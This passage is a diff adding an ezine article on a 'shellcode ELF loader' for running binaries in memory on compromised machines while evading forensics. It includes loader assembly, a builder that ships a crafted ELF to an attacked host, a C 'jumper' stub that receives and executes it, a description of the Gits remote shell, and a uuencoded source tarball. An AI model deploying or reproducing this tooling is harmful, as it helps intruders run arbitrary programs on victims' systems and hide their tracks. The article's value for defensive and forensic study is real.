+        movl    PHDR_MEMSZ(%edx),%ecx
+        repz    movsb
+
+ * loading step 3: to finish, some registers are cleaned and then the loader 
+   jump to the binary's entry point or _init().
+
+   .loader_entry_point:
+        movl    PHDR_ALIGN(%edx),%esp
+        movl    EHDR_ENTRY(%ebp),%eax
+        xorl    %ebx,%ebx
+        xorl    %ecx,%ecx
+        xorl    %edx,%edx
+        xorl    %esi,%esi
+        xorl    %edi,%edi
+        jmp     *%eax
+
+ * post-loading: the execution has begun.
+
+As can be seen, the loader doesn't undergo any process to build the stack
+context, it is constructed in the builder. This way, a pre-designed context is
+available and should simply be copied to the right address space inside the
+process.
+
+Despite the fact of codifying a different loader to each architecture the
+operations are plain and concrete. Whether possible, hybrid loaders capable 
+of functioning in the same architectures but with the different syscalls 
+methods of the UNIX systems should be designed. The loader we have developed
+for our implementation is an hybrid code capable of working under Linux and 
+BSD systems on x86/32bit machines.
+
+---[ 4.2 - The builder
+
+It has the mission of assembling the components of a lxobject and then 
+sending it to a remote machine. It works with a simple command line design 
+and its format is as follows:
+
+ ./builder <host> <port> <exec> <argv> <envp>
+
+where:
+
+  host, port = the attached machine address and the port where the jumper is
+  running and waiting
+
+  exec = the executable binary file we want to execute
+
+  argv, envp = string of arguments and string of environment variables, 
+  needed by the executable binary
+
+For instance, if we want to do some port scanning from the attacked host, we
+will execute an nmap binary as follows:
+
+ ./builder 172.26.0.1 2002 nmap-static "-P0;-p;23;172.26.1-30" "PATH=/bin"
+
+Basically, the assembly operations performed are the following:
+
+ * allocate enough memory to store the executable binary file, the shellcode 
+   loader and the stack's init context.
+
+      elf_new = (void*)malloc(elf_new_size);
+
+ * insert the executable into the memory area previously allocated and then
+   clean the fields which describe the section header table because they 
+   won't be useful for us as we will work with an static file. Also, the 
+   section header table could be removed anyway.
+
+      ehdr_new->e_shentsize = 0;
+      ehdr_new->e_shoff = 0;
+      ehdr_new->e_shnum = 0;
+      ehdr_new->e_shstrndx = 0;
+
+ * build the stack context. It requires two strings, the first one contains
+   the arguments and the second one the environment variables. Each item is
+   separated by using a delimiter. For instance:
+
+      <argv> =  "arg1;arg2;arg3;-h"
+      <envp> =  "PATH=/bin;SHELL=sh"
+
+   Once the context has been built, a new program header is added to the
+   binary's program header table. This is a PT_STACK header and contains all
+   the information which is needed by the shellcode loader in order to setup
+   the new stack.
+
+ * the shellcode ELF loader is introduced and its offset is saved within the
+   e_ident field in the elf header.
+
+      memcpy(elf_new + elf_new_size - PG_SIZE + LOADER_CODESZ, loader, LOADER_CODESZ);
+      ldr_ptr = (unsigned long *)&ehdr_new->e_ident[9];
+      *ldr_ptr = elf_new_size - PG_SIZE + LOADER_CODESZ;
+
+ * the lxobject is ready, now it's sent to specified the host and port.
+
+      connect(sfd, (struct sockaddr *)&srv, sizeof(struct sockaddr)
+      write(sfd, elf_new, elf_new_size);
+
+An lxobject finished and assembled correctly, ready to be sent, looks like 
+this:
+
+        [ Autoloadable and Autoexecutable Object ]
+    .------------------------------------------------
+    |
+    |       [ Static Executable File (1) ]
+    |    .--------------------------------.
+    |    |                                |
+    |    |    .----------------------.    |
+    |    |    | ELF Header )---------|----|--.
+    |    |    |----------------------|    |  | Shellcode Elf loader (3)
+    |    |    | Program Header Table |    |  | hdr->e_ident[9]
+    |    |    |                      |    |  |
+    |    |    | + PT_LOAD0           |    |  |
+    |    |    | + PT_LOAD1           |    |  |
+    |    |    |     ...              |    |  |
+    |    |    |     ...              |    |  |
+    |    |    | + PT_STACK )---------|----|--|--.
+    |    |    |                      |    |  |  | Stack Context (2)
+    |    |    |----------------------|    |  |  |
+    |    |    | Sections (code/data) |    |  |  |
+    |    '--> |----------------------| <--'  |  |
+    |    .--> |######################| <-----'  |
+    |    |    |## SHELLCODE LOADER ##|          |
+    |  P |    |######################|          |
+    |  A |    |                      |          |
+    |  G |    |       .......        |          |
+    |  E |    |       .......        |          |
+    |    |    |                      |          |
+    |    |    |######################| <--------'
+    |    |    |#### STACK CONTEXT ###|
+    |    |    |######################|
+    |    '--> '----------------------'
+    |
+    '-----------------
+
+---[ 4.3 - The jumper
+
+It is the shellcode which have to be used by an exploit during the exploitation
+process of a vulnerable service. Its focus is to activate the incoming lxobject
+and in order to achieve it, at least the following operations should be done:
+
+ - open a socket and wait for the lxobject to arrive
+ - store it anywhere in the memory
+ - activate it by jumping into the loader
+
+Those are the minimal required actions but it is important to keep in mind 
+that a jumper is a simple shellcode so any other functionality can be added 
+previously: break a chroot, elevate privileges, and so on.
+
+1) how to get the lxobject?
+
+ It is easily achieved, already known techniques, as binding to a port and
+ waiting for new connections or searching in the process' FD table those that
+ belong to socket, can be applied. Additionally, cipher algorithms can be 
+ added but this would lead to huge shellcodes, difficult to use.
+
+2) and where to store it?
+
+ There are three possibilities:
+
+ a) store it in the heap. We just have to find the current location of the 
+    program break by using brk(0). However, this method is dangerous and 
+    unsuitable because the lxobject could be unmapped or even entirely
+    overwritten during the loading process.
+
+ b) store it in the process stack. Provided there is enough space and we know
+    where the stack starts and finishes, this method can be used but it can
+    also be that the stack isn't be executable and then it can't be applied.
+
+ c) store it in a new mapped memory region by using mmap() syscall. 
+    This is the better way and the one we have used in our code. 
+
+Due to the nature of a jumper its codification can be personalized and 
+adapted to many different contexts. An example of a generic jumper written 
+in C is as it follows:
+
+    lxobject = (unsigned char*)mmap(0, LXOBJECT_SIZE,
+         PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0);
+
+    addr.sin_family = AF_INET;
+    addr.sin_port = htons(atoi(argv[1]));
+    addr.sin_addr.s_addr = 0;
+
+    sfd = socket(AF_INET, SOCK_STREAM, 0));
+    bind(sfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
+    listen(sfd, 10);
+    nsfd = accept(sfd, NULL, NULL));
+
+    for (i = 0 ; i < 255 ; i++) {
+        if (recv(i, tmp, 4, MSG_PEEK) == 4) {
+                if (!strncmp(&tmp[1], "ELF", 3)) break;
+        }
+    }
+
+    recv(i, lxobject, MAX_OBJECT_SIZE, MSG_WAITALL);
+
+    loader = (unsigned long *)&lxobject[9];
+    *loader += (unsigned long)lxobject;
+
+    __asm__(
+           "push %0\n"
+           "jmp *%1"
+           :
+           : "c"(lxobject),"b"(*loader)
+           );
+        
+---[ 5 - Multiexecution
+
+The code included in this article is just a generic implementation of a
+shellcode ELF loader which allows the execution of a binary once at time.
+If we want to execute that binary an undefined number of times (to parse more
+arguments, test new features, etc) it will be needed to build and send a new
+lxobject for each try. Although it obviously has some disadvantages, it's
+enough for most situations. But what happens if what we really wish is to
+execute our binary a lot of times but from the other side, that is, from
+the remote machine, without building the lxobject?
+
+To face this issue we have developed another technique called "multi-execution".
+The multi-execution is a much more advanced derived implementation. Its main 
+feature is that the process of building a lxobject is always done in the 
+remote machine, one binary allowing infinite executions. Something like 
+working with a remote shell. One example of tool that uses a multi-execution 
+environment is the gits project or "ghost in the system".
+
+--[ 5.1 - Gits
+
+Gits is a multi-execution environment designed to operate on attacked remote
+machines and to limit the amount of forensic evidence. It should be viewed as
+a proof of concept, an advanced extension with many features. It comprises a
+launcher program and a shell, which is the main part. The shell gives you the
+possibility of retrieving as many binaries as desired and execute them as 
+many times as wished (a process of stack context rebuilding and binary 
+patching is done using some advanced techniques). Also, built-in commands, job
+control, flow redirection, remote file manipulation, and so on have been 
+added.
+
+---[ 6 - Conclusions
+
+The forensic techniques are more sophisticated and complete every day, where
+there was no trace left, now there's a fingerprint; where there was only one
+evidence left, now there are hundreds. A never-ending battle between those who
+wouldn't be detected and those who want to detect. To use the memory and 
+leave the disk untouched is a good policy to avoid the detection. The 
+shellcode ELF loader develops this post-exploitation plainly and elegantly.
+
+---[ 7 - Greetings
+
+7a69ezine crew & redbull.
+
+---[ 8 - References
+
+ [1] The Design and Implementation of ul_exec - the grugq
+     http://securityfocus.com/archive/1/348638/2003-12-29/2004-01-04/0
+
+ [2] Remote Exec - the grugq
+     http://www.phrack.org/show.php?p=62&a=8
+
+ [3] Ghost In The System Project
+     http://www.7a69ezine.org/project/gits
+
+---[ A - Tested systems
+
+The next table summarize the systems where we have tested all this fucking
+shit.
+	
+                            /----------v----------\
+                            |   x86    |  amd64   |
+               /------------+----------+----------<
+               | Linux 2.4  |  works   |  works   |
+               >------------+----------+----------<
+               | Linux 2.6  |  works   |  works   |
+               >------------+----------+----------<
+               | FreeBSD    |  works   | untested |
+               >------------+----------+----------<
+               | NetBSD     |  works   | untested |
+               \------------^----------^----------/
+
+---[ B - Sourcecode
+
+begin 644 self.tgz
+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
